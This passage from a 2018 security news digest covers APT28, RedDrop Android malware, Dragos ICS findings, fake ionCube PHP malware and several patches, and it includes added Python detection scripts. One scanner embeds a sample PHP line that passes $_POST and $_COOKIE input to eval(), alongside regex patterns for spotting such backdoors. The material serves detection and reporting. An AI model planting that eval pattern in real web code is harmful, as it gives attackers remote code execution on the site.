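    ("2018-02-28 11:00:00", "carol", "DE", "legacy-backup"),  # host nobody normally touches
    ("2018-02-28 11:05:00", "carol", "DE", "legacy-backup"),
    ("2018-02-28 11:09:00", "carol", "DE", "legacy-backup"),
    ("2018-02-28 11:15:00", "carol", "DE", "legacy-backup"),
]


def parse(events):
    """Parse timestamps and return the events in chronological order."""
    parsed = [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), u, c, h) for ts, u, c, h in events]
    return sorted(parsed, key=lambda e: e[0])


def concurrent_logins(events, window=timedelta(minutes=30)):
    """Same user authenticating from two countries inside `window`.

    Returns (user, country_1, country_2, time_of_second_login) tuples.
    """
    by_user = defaultdict(list)
    for e in parse(events):
        by_user[e[1]].append(e)
    alerts = []
    for user, evs in by_user.items():
        for i, (t1, _, c1, _) in enumerate(evs):
            for t2, _, c2, _ in evs[i + 1:]:
                if t2 - t1 > window:
                    break                     # sorted, so nothing later can be inside the window
                if c1 != c2:
                    alerts.append((user, c1, c2, t2))
    return alerts


def off_hours_logins(events, start_hour=6, end_hour=22):
    """Logins outside the [start_hour, end_hour) working window (timestamps assumed local)."""
    return [(u, t) for t, u, _, _ in parse(events) if not start_hour <= t.hour < end_hour]


def bursts_on_rare_hosts(events, rare_days=2, burst=3, window=timedelta(hours=1)):
    """`burst` logins by one user to a host seen on fewer than `rare_days` distinct days.

    The whole event set stands in for the learned baseline a real UEBA engine keeps.
    Returns (user, host, time_of_first_login_in_burst, burst) tuples.
    """
    evs = parse(events)
    days_seen = defaultdict(set)
    for t, _, _, h in evs:
        days_seen[h].add(t.date())
    rare_hosts = {h for h, days in days_seen.items() if len(days) < rare_days}
    times = defaultdict(list)
    for t, u, _, h in evs:
        if h in rare_hosts:
            times[(u, h)].append(t)
    alerts = []
    for (u, h), ts in times.items():
        for i in range(len(ts) - burst + 1):
            if ts[i + burst - 1] - ts[i] <= window:
                alerts.append((u, h, ts[i], burst))
                break                         # one alert per user/host pair is enough
    return alerts


if __name__ == "__main__":
    for rule in (concurrent_logins, off_hours_logins, bursts_on_rare_hosts):
        for alert in rule(EVENTS):
            print(rule.__name__, alert)
```

Run against the constructed events, each rule fires exactly once: alice from DE and BR two minutes apart, bob at 03:14, and carol hitting legacy-backup three times in nine minutes. The point a practitioner should take from it is that every rule needs a baseline (what counts as "rare", what counts as "working hours" for this user) and that without one the same logic drowns the team in alerts.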

Fortinet has also announced version 6 of its Security Fabric. "FortiOS 6.0," says founder, president and CTO Michael Xie, "delivers hundreds of new features and capabilities that were designed to provide the broad visibility, integrated threat intelligence and automated response required for digital business."

The Security Fabric is built on FortiOS, which Fortinet describes as the world's most deployed network security operating system. It was launched in 2016 to let the different segments of network security integrate seamlessly and cooperate under central management. FortiOS 6.0 is expected to be available before the end of March 2018.

Example enhancements include multi-cloud visibility, where cloud connectors provide visibility spanning private clouds (with support for VMware NSX, Cisco ACI and Nokia Nuage); public clouds (supporting AWS, Azure, Google Cloud and Oracle Cloud); and SaaS clouds with CASB connectors (supporting Salesforce.com, Office 365, Dropbox, Box, AWS and more).

FortiClient 6.0 includes expanded OS support for Linux, providing IoT endpoint security. Actionable insights from the IoT devices can be shared with the Security Fabric, while telemetry can provide a deeper insight on what is running on a network's endpoint devices to quickly identify vulnerabilities.

Other enhancements involve network security, advanced threat protection, email and web applications, security management and analytics, and unified access.

"Using a single partner for integrated protection across multiple threat vectors, from public cloud workloads to email SaaS applications, is a key priority for ShipServ," says Dominic Aslan, VP of IT operations at the online marketplace for the marine industry. "Fortinet is an all-in-one cyber security company with a common, intuitive security management interface across all the Fortinet Security Fabric solutions, making it much easier to support."

Russian Hackers Infiltrated German Ministries' Network: Report
1.3.2018 securityweek BigBrothers

Berlin - Russian hackers have infiltrated Germany's foreign and interior ministries' online networks, German news agency DPA reported Wednesday quoting unnamed security sources.

The hacker group known as APT28 -- which has been linked to Russia's GRU military intelligence and accused of attacks on Hillary Clinton's 2016 presidential campaign -- managed to plant malware in the ministries' networks for possibly as long as a year, the news agency said.

German security authorities only detected the online spying in December, it said, adding that an isolated government IT network had also been hit.

If confirmed, the attack would be the biggest to hit the German government.

Top security officials had repeatedly warned during Germany's 2017 general election that Russian hackers might seek to disrupt the polls.

While authorities did not have concrete proof, they have pinned the malware attack that crippled the Bundestag parliamentary network for days in 2015 on APT28, also known as "Fancy Bear" or "Sofacy".

The attack netted 17 gigabytes of data which, officials feared, could be used to blackmail MPs or discredit them.

Amid the rising frequency of attacks, Germany's defence ministry in 2016 set up a cyber department to coordinate a response to online intrusions.

"RedDrop" Mobile Malware Records Ambient Audio
1.3.2018 securityweek Android

A newly detailed mobile malware can do more than steal data from infected devices: it can also record ambient audio and send the recordings to cloud storage accounts controlled by attackers.

Dubbed RedDrop, the malware can also inflict financial costs on victims by sending SMS messages to premium services, security firm Wandera says. The U.K.-based company has discovered 53 malware-ridden apps that are exfiltrating sensitive data from infected devices.

RedDrop-infected applications are being distributed through a network of more than 4,000 domains and range from tools such as image editors and calculators to recreational apps. Every observed application offers the expected functionality, thus hiding the malicious content stored within.

Once the user installs an application from the RedDrop family, it requests invasive permissions so that the next steps of the attack can be performed without further user interaction, the security researchers reveal. The malware even asks for permissions that allow it to persist across reboots and to communicate continuously with its command and control (C&C) servers.

To lure victims to their malicious network, the attackers even display ads on the popular Chinese search engine Baidu. One such ad would take the user to huxiawang.cn, the primary distribution site for the attack, which encourages users to download one of the 53 malicious apps.

Once the user installs a RedDrop-infected application, 7 additional APKs are silently downloaded and executed on the device, each meant to enable additional malicious functionality. The downloaded components are loaded dynamically into the device’s memory rather than being shipped in the original package.

One of the observed applications (CuteActress) was designed to send an SMS message to a premium service each time the user would touch the screen to interact with the app’s legitimate functionality. The threat would also delete all of these messages, thus erasing any evidence of these premium SMS.

The RedDrop malware family also includes a set of spyware tools capable of extracting valuable and damaging data from the victim’s device. The Wandera researchers attributed encrypted and unencrypted data, encoded data and TCP streams to RedDrop’s exfiltration activities.

Stolen data includes locally saved files (such as photos and contacts), device-related information (IMEI, IMSI, etc), SIM info (MNC, MCC, etc), application data, and information on nearby Wi-Fi networks. More disturbing is the fact that RedDrop can also record audio of the device’s surroundings.

According to Wandera, RedDrop is one of the most sophisticated Android malware families, given the range of functioning malicious applications it hides behind and its complex distribution network. The malware is expected to remain active even after the applications are flagged as malicious, and new variants are expected to emerge in the coming months.

“This multifaceted hybrid attack is entirely unique. The malicious actor cleverly uses a seemingly helpful app to front an incredibly complex operation with malicious intent. This is one of the more persistent malware variants we’ve seen,” Dr Michael Covington, VP of Product Strategy at Wandera, says.

According to Craig Young, computer security researcher for Tripwire, this is not the first time Android malware that includes such extensive spyware capabilities has been discovered and the research appears exaggerated.

“This looks more like a very amateur trial run of Android malware rather than “one of the most sophisticated pieces of Android malware” as claimed by Wandera,” Young told SecurityWeek in an emailed comment.

He also pointed out that the malware’s ability to record and upload calls “provides minimal value outside of targeted attacks and potentially makes the malware more apparent by draining a victim’s battery quickly.”

Young recommends paying extra attention to the permissions applications may request, as this is a great means to stay safe from infections.

“With Android 6 (released 2015), apps will request permissions at runtime which should make it abundantly obvious when a malicious app wants to do something like sending SMS or recording audio. Users of older Android releases must rely instead on reviewing the requested permissions at install time to confirm that they are appropriate for the app,” Young concluded.

Five Threat Groups Target Industrial Systems: Dragos
1.3.2018 securityweek ICS

There are at least five sophisticated threat groups whose activities focus on industrial control systems (ICS), according to a report published on Thursday by industrial cybersecurity firm Dragos.

While it’s not uncommon for non-targeted malware to make its way onto industrial systems, targeted attacks have also become increasingly common. Dragos currently tracks five threat actors that have either attacked ICS directly or have shown an interest in gathering information on these types of systems.

One of these groups is tracked by the security firm as Electrum. This is the actor behind the CRASHOVERRIDE/Industroyer malware used in December 2016 to cause a power outage in Ukraine. Electrum has been linked to Sandworm Team, which is believed to be responsible for a 2015 power outage in Ukraine. Russia has been accused of both attacks.

While it apparently hasn’t launched any major attacks since the 2016 campaign against Ukraine’s energy sector, Dragos says Electrum remains active, and evidence suggests it has expanded its targets.

“While past ELECTRUM activity has focused exclusively on Ukraine, information from low-level ongoing events and the group’s link to SANDWORM Dragos assesses that ELECTRUM could be ‘re-tasked’ to other areas depending on the focus of their sponsor,” Dragos said in its report.

Another gang tracked by Dragos is Covellite, which has been linked to North Korea’s Lazarus group. Researchers started observing Covellite in September 2017, when it launched a highly targeted phishing campaign against a U.S. electric grid company. They later spotted attacks that may have been conducted by this group aimed at organizations in Europe, North America and East Asia.

Unlike Electrum, Covellite has yet to use malware specifically designed to target industrial systems in its campaigns.

Dragos’ report also summarizes the activities of Dymalloy, a group whose attacks came to light during an investigation into Dragonfly, an actor that is also known as Crouching Yeti and Energetic Bear. Dragonfly, which is believed to be operating out of Russia, is known for its sophisticated Havex malware, and it was recently observed targeting control systems in U.S. energy firms.

Dragos believes Dymalloy is not linked – at least not directly – to Dragonfly and its tools are not as advanced as Havex. However, the hackers did manage to breach ICS organizations in Turkey, Europe and North America, gaining access to HMI devices.

Experts say Dymalloy appears to have become less active since early 2017, possibly in response to attention from the media and security researchers.

Since mid-2017, Dragos has been tracking a group it has named Chrysene, whose activity focuses on North America, Western Europe, Israel and Iraq, particularly organizations in the electricity generation and oil and gas sectors.

Chrysene, which continues to be active, has used a unique variation of a framework associated with the Iran-linked cyber espionage groups known as OilRig and Greenbug.

“While CHRYSENE’s malware features notable enhancements over related threat groups using similar tools, Dragos has not yet observed an ICS-specific capability employed by this activity group. Instead, all activity thus far appears to focus on IT penetration and espionage, with all targets being ICS-related organizations,” Dragos said.

It’s worth noting that the recently uncovered piece of malware known as Trisis/Triton, which is the first threat specifically designed to disrupt safety instrumented systems (SIS), has also been linked by some researchers to Iran.

The last ICS-focused threat group monitored by Dragos is Magnallium, which has also been linked to Iran. The security firm started tracking this actor following a report from FireEye on the activities of APT33.

While some media reports portrayed APT33 as a serious threat to ICS and critical infrastructure, Dragos’ investigation showed that the group does not appear to possess any ICS-specific capabilities.

“While only one [of these groups] has demonstrated an apparent capability to impact ICS networks through ICS-specific malware directly, all have engaged in at least reconnaissance and intelligence gathering surrounding the ICS environment,” Dragos said.

“These groups have remained relatively constant regarding overall activity throughout the year, and Dragos is confident that additional unknown events have occurred,” the company added.

Public Advisories Fail to Convey True Impact of ICS Flaws
1.3.2018 securityweek ICS

Public advisories describing vulnerabilities in industrial control systems (ICS) often fail to convey the true impact of the flaws, according to a report published today by ICS cybersecurity firm Dragos.

An analysis of 163 advisories published last year by ICS-CERT and others – excluding reports on medical device flaws, which ICS-CERT regularly covers – allowed Dragos to compile some useful statistics.

The company determined that patches for nearly two-thirds of the security holes disclosed last year don’t fully eliminate the risk due to the fact that the affected systems had been insecure by design.

Another interesting point made by Dragos in its report is that 85% of the vulnerabilities can be exploited late in the kill chain and they are not useful for getting an initial foothold in the targeted organization’s network. This means that an attacker who manages to exploit the flaws has had access to the target’s network for some time.

Once exploited, one-third of the vulnerabilities lead to what Dragos describes as “loss of view,” which results in the victim not being able to monitor or read the state of the compromised system.

In 29% of cases, exploitation of the bugs leads to “loss of control,” preventing any modifications to the state of the system. In roughly the same percentage of cases, exploitation of a flaw leads to both loss of control and loss of view.

“Vulnerabilities which lead to both a loss of view and control occur in the core of traditional control networks affecting both field devices (PLCs, RTUs, etc.) as well as management such as human-machine interface (HMI) systems and engineering workstation (EWS) software,” Dragos explained in its report. “This means that a large percentage (61%) of ICS-related vulnerabilities will cause severe operational impact if exploited.”


Many of the flaws covered by the advisories analyzed by Dragos affect products that are further away from the perimeter of the operational technology (OT) network, which makes them less likely to be exploited.

However, 15% of advisories describe vulnerabilities in components located very close to the network perimeter. Systems such as historians, OPC servers, firewalls, VPN products, and cellular gateways are often directly accessible from the business network and even from the Internet, which makes them more likely to be attacked.

Nearly one-quarter of the weaknesses impact field devices, while 31% affect HMIs.


“Most of the control system vulnerability patching focus should be placed on the 30% of vulnerabilities which impact exterior-facing systems,” Dragos said. “Since so many assets and interior control elements are nowhere near a network border, applying patches in the 85% of interior and none-to-medium proximity cases would likely have little to no reduction in risk for impact against attack.”

Dragos also addressed the common belief that most ICS vulnerabilities are found in demo or free software rather than in actual control systems: the company found that 63% of all ICS-related flaws disclosed last year affected software or hardware that could not have been obtained for free.

The security firm’s analysis also revealed that 72% of public advisories describing ICS flaws did not provide any alternative mitigations. According to Dragos, recommending the use of VPNs and trusted networks, which is included in most advisories, does not count as alternative mitigations.

RedDrop, a new Android Malware records ambient Audio and exfiltrate user’s data
1.3.2018 securityaffairs Android

RedDrop malware is a recently discovered mobile threat that can steal data from infected devices and also record ambient audio.
Security researchers at Wandera have spotted a new sophisticated family of mobile malware dubbed RedDrop that can steal data, record audio, and intercept SMS. All data stolen from infected systems is uploaded to remote file storage systems.

The researchers found the malicious code in dozens of apparently innocuous apps: RedDrop was hidden in 53 Android applications, including image editors, calculators, language learning apps and space exploration apps.

The applications work as expected and the RedDrop malware is executed in the background.

“The latest zero-day threat to be discovered by Wandera’s mobile threat research team is RedDrop, a family of mobile malware inflicting financial cost and critical data loss on infected devices.” reads the analysis published by Wandera. “The most worrying part? The 53 malware-ridden apps are exfiltrating sensitive data – including ambient audio recordings – and dumping it in the attackers’ Dropbox accounts to prepare for further attacks and extortion purposes.”

Once an infected app is installed, it downloads at least seven more Android application packages (APKs) from a separate command and control server, each implementing one malicious function. The APKs are held in the device’s memory, which allows them to be executed without that functionality being present in the original malware sample.

The RedDrop malware can also send SMS messages to a premium service and then immediately delete them to avoid detection by the user.

The researchers discovered that the malicious Apps are distributed from a complex network composed of more than 4,000 domains registered to the same underground group that might be operating out of China.

“Wandera’s machine learning detections first uncovered one of the RedDrop apps when a user clicked on an ad displaying on popular Chinese search engine Baidu.” continues the analysis. “The user was then taken to huxiawang.cn, the primary distribution site for the attack. The landing pages that follow host various content to encourage and incite the user to download one of the 53 apps within the RedDrop family of malicious apps.”

One of the applications observed by the researchers (CuteActress) was designed to send an SMS message to a premium service every time the user would use a functionality of the app. The threat would also delete all of these messages, thus erasing any evidence of these premium SMS.


Currently, most of the observed infections are in China, followed by Europe and America.

Android users who download apps from third-party sources and websites are the most exposed to this threat; no instance of RedDrop has yet been found on the Google Play store or on other official stores.

Hundreds of sites based on WordPress, Joomla and CodeIgniter infected by ionCube Malware
1.3.2018 securityaffairs

Security researchers at the firm SiteLock have discovered that hundreds of websites have been infected with the ionCube malware.
Security researchers at SiteLock have discovered that hundreds of websites have been infected with malware that masquerades as legitimate ionCube-encoded files.

ionCube is an encoding technology used to protect PHP software from being viewed, changed, and run on unlicensed computers.

The experts were analyzing an infected WordPress website when they discovered a number of suspiciously named, obfuscated files, such as “diff98.php” and “wrgcduzk.php”, that appeared almost identical to legitimate ionCube-encoded files. Further analysis revealed that hundreds of websites were infected by the same ionCube malware.

“While reviewing an infected site, the SiteLock Research team found a number of suspiciously named, obfuscated files that appear almost identical to legitimate ionCube-encoded files. We determined the suspicious ionCube files were malicious, and found that hundreds of sites and thousands of files were affected.” reads the analysis published by SiteLock.

“Overall, our investigation found over 700 infected sites, totalling over 7,000 infected files.”

Further analysis revealed that the attackers had also compromised Joomla and CodeIgniter websites. The threat actors packed their malware so that it looks like an ionCube-encoded file.

Because the files are plain PHP underneath, the malicious code could in principle be deployed on any website served by a PHP-enabled web server; once decoded, the fake ionCube files reveal the actual ionCube malware.

“While there’s still some degree of obfuscation, the presence of the $_POST and $_COOKIE superglobals and the eval request at the end of the file reveal its true purpose: to accept and execute remotely supplied code.” continues the analysis. “It looks like the remote code supplied to this file is further obfuscated and there may be some sort of access control implemented, judging by the GUID-formatted string present.”


The researchers also provided recommendations for mitigating the ionCube malware: administrators should treat the presence of ionCube-encoded files they did not deploy themselves as an indicator of compromise.

If an infection is detected, scanning the entire site is recommended in order to eliminate the threat completely; the researchers also suggest deploying a web application firewall (WAF).

“If you find indicators of this infection, we strongly recommend having your site scanned for malware as soon as possible, as this malware seldom appears on its own.” concluded the analysis.

“This is especially important if you are using an ionCube-encoded application, as manually differentiating the malicious files from the legitimate ones is difficult, and it is common to see up to 100 slightly different variants of this malware on a single site. “
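A first-pass triage scanner for the indicators described above, added here as an example; it is neither SiteLock's tooling nor the malware itself. It walks a document root for .php files that open with an ionCube loader stub yet also reference $_POST/$_COOKIE, end in an eval() call, or carry a GUID-formatted token, which is exactly the combination the write-up says gives the fake files away. The header regex is an assumption about the shape of ionCube output (a "<?php //<hex>" first line followed by a check for the ionCube Loader extension), the sample files are constructed for the demo, and the fake one reproduces only the indicators, not a working payload. Treat hits as a shortlist for a full malware scan, since a site that legitimately runs ionCube-encoded software can trip the loader check on every file.

```python
"""Triage scanner for fake ionCube-encoded PHP files (added example, not SiteLock's tool)."""
import os
import re
import tempfile

# Assumed shape of legitimate ionCube output: a "<?php //<hex>" first line and a stub
# that checks for the ionCube Loader extension before the opaque encoded payload.
ION_HEADER = re.compile(r"^<\?php\s*//[0-9a-f]{4,}", re.IGNORECASE)
ION_LOADER = "ionCube Loader"
# Indicators SiteLock described in the fake files.
SUPERGLOBAL = re.compile(r"\$_(POST|COOKIE|REQUEST|GET)\b")
EVAL_CALL = re.compile(r"\beval\s*\(", re.IGNORECASE)
GUID = re.compile(r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.IGNORECASE)

# Constructed samples, not files from the campaign. The fake one carries only the
# indicators; the decoding and the payload are deliberately omitted.
LEGIT_SAMPLE = (
    "<?php //0046a\n"
    "if(!extension_loaded('ionCube Loader')){die('The ionCube Loader is not installed.');}\n"
    "HR+cPqyJ8VZhLm0xN3dU5bQe7kT2vWx9yAzFgHjKlMnOpRsTuVwXyZ0123456789+/abc=\n"
)
FAKE_SAMPLE = (
    "<?php //0046b\n"
    "if(!extension_loaded('ionCube Loader')){die('Loader missing');}\n"
    "$k='9d2f3a7e-1c4b-4e8f-9a6d-2b7c5e1f0a34';\n"            # GUID-style access token
    "$d=$_POST['x'].$_COOKIE['y'];\n"                         # remotely supplied code
    "eval(/* decoding of $d omitted in this sample */ $d);\n"
)
PLAIN_SAMPLE = "<?php\necho 'hello';\n"


def classify(content):
    """Return a verdict ('plain', 'encoded' or 'suspicious') and the indicators found."""
    head, tail = content[:512], content[-512:]
    claims_ioncube = bool(ION_HEADER.search(head)) or ION_LOADER in head
    indicators = []
    if SUPERGLOBAL.search(content):
        indicators.append("superglobal")
    if EVAL_CALL.search(tail):            # the write-up notes the eval sits at the end
        indicators.append("eval-at-end")
    if GUID.search(content):
        indicators.append("guid-token")
    if claims_ioncube and indicators:
        verdict = "suspicious"
    elif claims_ioncube:
        verdict = "encoded"
    else:
        verdict = "plain"
    return {"verdict": verdict, "indicators": indicators}


def scan_tree(root):
    """Walk `root` and return (path, indicators) for every suspicious .php file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = classify(fh.read())
            if result["verdict"] == "suspicious":
                hits.append((path, result["indicators"]))
    return hits


def demo():
    """Write the three samples into a temporary site tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("license.php", LEGIT_SAMPLE),     # legitimate-looking encoded file
                           ("wrgcduzk.php", FAKE_SAMPLE),     # name taken from the write-up
                           ("index.php", PLAIN_SAMPLE)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.basename(p), ind) for p, ind in scan_tree(root)]


if __name__ == "__main__":
    for name, indicators in demo():
        print(name, indicators)
```

On the constructed tree only wrgcduzk.php is reported, with all three indicators; the legitimate-looking file classifies as "encoded" and is left alone. Because the campaign drops many slightly different variants per site, a scanner like this is useful for sizing the cleanup, but the decision to remove a file should still rest on a full scan of the site rather than on these three regexes.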

DPA Report: Russia-linked APT28 group hacked Germany’s government network
1.3.2018 securityaffairs APT  BigBrothers

The German government has confirmed that hackers breached its computer network and implanted malware that went undetected for a year.
German news agency DPA reported that Russian hackers belonging to the APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium) breached the online networks of Germany’s foreign and interior ministries.

The agency, quoting unnamed security sources, revealed that the APT28 hackers planted malware in the ministries’ networks. The malicious code went undetected for as long as a year.

“A Russian-backed hacker group known for many high-level cyber attacks was able to infiltrate the German government’s secure computer networks, the dpa news agency reported Wednesday.” reported the ABCnews.

The German government discovered the intrusion in December, but experts believe the hackers had been inside the networks for as long as a year. DPA also added that the hackers were able to penetrate an isolated government IT network.

“within the federal administration the attack was isolated and brought under control.” said the Interior Ministry that also confirmed an ongoing investigation.

“This case is being worked on with the highest priority and considerable resources,” the ministry added.

This isn’t the first time that Russia-linked APT28 has been blamed for a cyber attack against Germany: in 2015 the group hacked into the systems of the German Parliament, an intrusion that netted 17 gigabytes of data which officials feared could be used to blackmail or discredit MPs.

What will happen in the future?

Top German intelligence officials are asking the government for the authority to hack back attackers in the event of a cyber attack by a foreign government.

Victims of the GandCrab ransomware can decrypt their files for free using the decryptor
1.3.2018 securityaffairs

The GandCrab ransomware decryptor has been released by the Romanian Police (IGPR) under the supervision of the General Prosecutor’s Office (DIICOT) and in collaboration with the internet security company Bitdefender and Europol.
Bitdefender has teamed up with Europol, the Romanian Police and the Directorate for Investigating Organized Crime and Terrorism (DIICOT) to release a free decryption tool for the infamous GandCrab ransomware.

In early February, experts at the cyber security firm LMNTRIX discovered GandCrab, a new ransomware-as-a-service advertised in Russian-speaking hacking communities on the dark web.

Researchers noticed that the authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

Affiliates are prohibited from targeting countries in the Commonwealth of Independent States (Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Uzbekistan and Ukraine).

It has been estimated that GandCrab infected approximately 50,000 computers, most of them in Europe, in less than a month, demanding ransoms of $400 to $700,000 in Dash cryptocurrency from each victim.

“As of today, a new decryption tool for victims of the GandCrab ransomware is available on www.nomoreransom.org. This tool has been released by the Romanian Police (IGPR) under the supervision of the General Prosecutor’s Office (DIICOT) and in collaboration with the internet security company Bitdefender and Europol.” reads the announcement published by Europol. “First detected one month ago, GandCrab has already made 50 000 victims worldwide, a vast number of which in Europe, making it one of the most aggressive forms of ransomware so far this year.”

Thanks to Bitdefender and European law enforcement, victims of GandCrab can now recover their files without paying the ransom.

“Ransomware has become a billion-dollar cash cow for malware authors, and GandCrab is one of the highest bidders,” Bitdefender’s Senior Director of the Investigation and Forensics Unit, Catalin Cosoi says.

“We are glad to provide our technical expertise in fighting cyber-crime as our long-standing mission is to protect the world’s Internet users and organizations. In the near future, we expect ransomware developers to migrate towards mining and stealing cryptocurrency”


The tool is available from Bitdefender and through the No More Ransom project at www.nomoreransom.org.

Remotely Exploitable Flaws Patched in DHCP
1.3.2018 securityweek

Updates released by the Internet Systems Consortium (ISC) for its Dynamic Host Configuration Protocol (DHCP) software patch two remotely exploitable vulnerabilities discovered by a researcher at Google.

Felix Wilhelm of the Google Security Team found that the DHCP client (dhclient), which provides a means of configuring network interfaces, is affected by a buffer overflow vulnerability that allows a malicious DHCP server to crash the client.

In some cases, exploitation of the flaw could also lead to remote code execution, ISC said in an advisory. The security hole is tracked as CVE-2018-5732 and rated high severity.

“Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution but we can not rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur,” ISC said.

The second vulnerability, CVE-2018-5733, is a medium severity issue that can be exploited to exhaust the memory available to the DHCP daemon (dhcpd), resulting in a denial-of-service (DoS) condition to clients.

“A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash,” ISC said.

The flaws affect DHCP versions 4.1.0 through 4.1-ESV-R15, 4.2.0 through 4.2.8, 4.3.0 through 4.3.6, and 4.4.0. Fixes are included in versions 4.1-ESV-R15-P1, 4.3.6-P1 and 4.4.1.

ISC said there was no evidence that the vulnerabilities had been exploited for malicious purposes.

The organization has also informed customers of a vulnerability affecting BIND Supported Preview Edition, which is a customer-only, non-public version of BIND. The flaw, tracked as CVE-2018-5734 and rated high severity, can lead to an assertion failure, which typically causes the software to crash.

Emerson Patches Severe Flaw in ControlWave Controllers
1.3.2018 securityweek

Automation solutions provider Emerson has patched a potentially serious denial-of-service (DoS) vulnerability in its ControlWave Micro Process Automation Controller product.

ControlWave Micro Process Automation Controller is a hybrid remote terminal unit (RTU)/programmable logic controller (PLC) used around the world, particularly in the energy, and water and wastewater systems sectors.

According to an advisory published this week by ICS-CERT, this Emerson product is affected by a high severity stack-based buffer overflow vulnerability that can be exploited to force the device to enter “halt mode” by sending specially crafted packets on port 20547.

“Exploitation may possibly cause a halt of Ethernet functionality, requiring a cold start to restore the system as well as communications related to ControlWave Designer access. This can possibly result in a loss of system availability and disruption in communications with other connected devices,” ICS-CERT said in its advisory.

The flaw, tracked as CVE-2018-5452, affects ControlWave Micro controllers running version 05.78.00 and prior of the firmware. Emerson patched the vulnerability with the release of version 05.79.00.

The security hole was reported to Emerson by Nozomi Networks, a company that specializes in cybersecurity and visibility solutions for industrial control systems (ICS). The firm, which recently raised $15 million in a Series B funding round, said it did not take long to find the flaw using a process it developed for testing ICS devices.

Moreno Carullo, co-founder and CTO of Nozomi, told SecurityWeek that the vulnerability can be exploited remotely over the Internet against devices that have port 20547 open. A Shodan search conducted by the company showed 163 potentially vulnerable devices, mainly in the United States, Canada and Mexico.

Carullo said the vulnerability was reported to Emerson in October 2017 and it was patched after roughly two months, which he described as “relatively fast compared to others.”

Siemens Releases BIOS Updates to Patch Intel Chip Flaws
28.2.2018 securityweek

Siemens has released BIOS updates for several of its industrial devices to patch vulnerabilities discovered recently in Intel chips, including Meltdown, Spectre and flaws affecting the company’s Management Engine technology.

Following the disclosure of the Meltdown and Spectre attack methods, industrial control systems (ICS) manufacturers immediately started analyzing the impact of the flaws on their products. Advisories have been published by companies such as Siemens, Rockwell Automation, Schneider Electric, ABB, and Pepperl+Fuchs.

Siemens has determined that the security holes expose many of its product lines to attacks, including RUGGEDCOM, SIMATIC, SIMOTION, SINEMA, and SINUMERIK.

The company informed customers recently that it has started releasing BIOS updates for some of its impacted products, including SIMATIC industrial PCs, SIMATIC field PG rugged laptops, SIMATIC industrial tablet PCs (ITP), and SINUMERIK panel control units (PCU). In addition to firmware patches, users have been advised to install operating system updates, which should mitigate the Meltdown flaw and one variant of Spectre.

The BIOS updates released by the company for the aforementioned SIMATIC and SINUMERIK devices also patch several vulnerabilities discovered last year by researchers in Intel’s Management Engine (ME), Server Platform Services (SPS), and Trusted Execution Engine (TXE) technologies.

The flaws impacting these Intel products can be exploited – in most cases locally, but at least one bug is remotely exploitable – for arbitrary code execution, privilege escalation, and denial-of-service (DoS) attacks.

The firmware updates from Siemens also fix a vulnerability affecting the Trusted Platform Module (TPM) in chips made by German semiconductor manufacturer Infineon.

The flaw, CVE-2017-15361, is related to the RSA library in TPM and it could allow a remote attacker who knows the public key to obtain the private RSA key. The security hole affects the products of several major tech firms, including Microsoft, Google, HP, Lenovo and Fujitsu.

Siemens has published separate advisories to inform users about the availability of patches for Meltdown/Spectre, Intel ME, and Infineon TPM vulnerabilities. ICS-CERT has so far published an advisory only for the Infineon issue.

Fake ionCube Malware Hits Hundreds of Sites
28.2.2018 securityweek

Hundreds of websites have been infected with malware that masquerades as legitimate ionCube-encoded files, SiteLock warns.

The malicious files were initially discovered in core directories of a WordPress site, featuring naming patterns usually associated with malware, namely “diff98.php” and “wrgcduzk.php.” Because the obfuscated files appear as if they had been encoded with ionCube, the researchers named the threat ionCube malware.

ionCube is an old and powerful PHP obfuscation technology that can be used to scramble text-based PHP files in order to protect intellectual property. Due to licensing costs, ionCube isn’t usually used for malicious purposes.

Malicious attackers, however, found a way to pack their malware in a manner that resembles that of ionCube-encoded files, and started targeting various websites. Although the infection was initially spotted on a WordPress site, SiteLock's researchers discovered that Joomla and CodeIgniter sites have been infected as well.

According to SiteLock, the malware is likely to run on any web server running PHP, and could hide in plain sight by using filenames such as “inc.php” and “menu.php.” Overall, the researchers discovered over 7,000 infected files and say that over 700 sites were compromised.

Once decoded, the fake ionCube files turn into the malware itself, which still contains some obfuscation, along with some sort of access control, researchers discovered.

“While there’s still some degree of obfuscation, the presence of the $_POST and $_COOKIE superglobals and the eval request at the end of the file reveal its true purpose: to accept and execute remotely supplied code. It looks like the remote code supplied to this file is further obfuscated and there may be some sort of access control implemented, judging by the GUID-formatted string present,” SiteLock says.

Site administrators who haven’t specifically and intentionally installed ionCube-encoded files but do find such files on their servers have likely been infected. If an infection is detected, scanning the entire site is recommended in order to completely eliminate the threat.

According to SiteLock, differentiating between the fake and legitimate files can be very difficult as well, given the large number of malware variations out there. The researchers say it is common to see up to 100 slightly different variants of the malware on a single site.
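A heuristic triage scanner built from the indicators SiteLock describes above, as an added example that is not SiteLock's tool or code from the original article: it flags PHP files that read attacker-controlled input from $_POST or $_COOKIE and end in an eval(), and records whether the file also carries an ionCube-looking header comment and a GUID-formatted string. The header pattern (a "//0<hex>" comment directly after the opening tag), the samples and the scan_tree helper are assumptions; the scanner narrows down what to look at, it does not replace a full site scan.

```python
"""Heuristic triage scanner for fake ionCube-encoded PHP files.
Added example; the header pattern and the samples are assumptions."""
import re
import sys
from dataclasses import dataclass, field
from pathlib import Path

# Indicators from SiteLock's description: $_POST/$_COOKIE input, an eval() at
# the end of the file, and a GUID-formatted string used as an access token.
# The header regex is an assumption about how ionCube-style files begin
# (an "//0<hex>" comment immediately after the opening tag).
IONCUBE_HEADER = re.compile(r"^\s*<\?php\s*//0[0-9a-fA-F]+")
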